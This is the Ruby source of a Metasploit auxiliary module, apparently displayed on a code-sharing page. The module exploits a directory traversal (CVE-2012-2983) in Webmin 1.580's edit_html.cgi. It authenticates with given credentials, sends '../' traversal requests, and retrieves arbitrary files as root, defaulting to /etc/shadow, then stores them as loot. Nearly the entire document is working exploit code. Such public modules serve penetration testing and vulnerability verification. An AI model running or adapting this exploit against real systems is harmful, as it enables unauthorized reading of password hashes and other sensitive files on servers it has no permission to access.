Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access',
13
      'Description'    => %q{
14
          This module exploits a directory traversal in Webmin 1.580. The vulnerability
15
        exists in the edit_html.cgi component and allows an authenticated user with access
16
        to the File Manager Module to access arbitrary files with root privileges. The
17
        module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.
18
      },
19
      'Author'         => [
20
        'Unknown', # From American Information Security Group
21
        'juan vazquez' # Metasploit module
22
      ],
23
      'License'        => MSF_LICENSE,
24
      'References'     =>
25
        [
26
          ['OSVDB', '85247'],
27
          ['BID', '55446'],
28
          ['CVE', '2012-2983'],
29
          ['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf'],
30
          ['URL', 'https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80']
31
        ],
32
      'DisclosureDate' => '2012-09-06',
33
      'Actions'        =>
34
        [
35
          ['Download', 'Description' => 'Download arbitrary file']
36
        ],
37
      'DefaultAction'  => 'Download'
38
      ))
39

40
    register_options(
41
      [
42
        Opt::RPORT(10000),
43
        OptBool.new('SSL', [true, 'Use SSL', true]),
44
        OptString.new('USERNAME',  [true, 'Webmin Username']),
45
        OptString.new('PASSWORD',  [true, 'Webmin Password']),
46
        OptInt.new('DEPTH', [true, 'Traversal depth', 4]),
47
        OptString.new('RPATH', [ true, "The file to download", "/etc/shadow" ])
48
      ])
49
  end
50

51
  def run
52

53
    peer = "#{rhost}:#{rport}"
54

55
    print_status("Attempting to login...")
56

57
    data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
58

59
    res = send_request_cgi(
60
      {
61
        'method'  => 'POST',
62
        'uri'     => "/session_login.cgi",
63
        'cookie'  => "testing=1",
64
        'data'    => data
65
      }, 25)
66

67
    if res and res.code == 302 and res.get_cookies =~ /sid/
68
      session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || ''
69
      if session and not session.empty?
70
        print_good "Authentication successful"
71
      else
72
        print_error "Authentication failed"
73
        return
74
      end
75
    else
76
      print_error "Authentication failed"
77
      return
78
    end
79

80
    print_status("Attempting to retrieve #{datastore['RPATH']}...")
81

82
    traversal = "../" * datastore['DEPTH']
83
    traversal << datastore['RPATH']
84
    data = "file=#{traversal}&text=1"
85

86
    res = send_request_cgi(
87
      {
88
        'method'  => 'GET',
89
        'uri'     => "/file/edit_html.cgi?#{data}",
90
        'cookie'  => "sid=#{session}"
91
      }, 25)
92

93
    if (res and res.code == 200 and res.body =~ /#{traversal}/ and res.body =~ /name=body>(.*)<\/textarea>/m)
94
      loot = $1
95
      f = ::File.basename(datastore['RPATH'])
96
      path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH'])
97
      print_good("#{datastore['RPATH']} saved in #{path}")
98
    else
99
      print_error("Failed to retrieve the file")
100
      return
101
    end
102

103
  end
104
end
105

106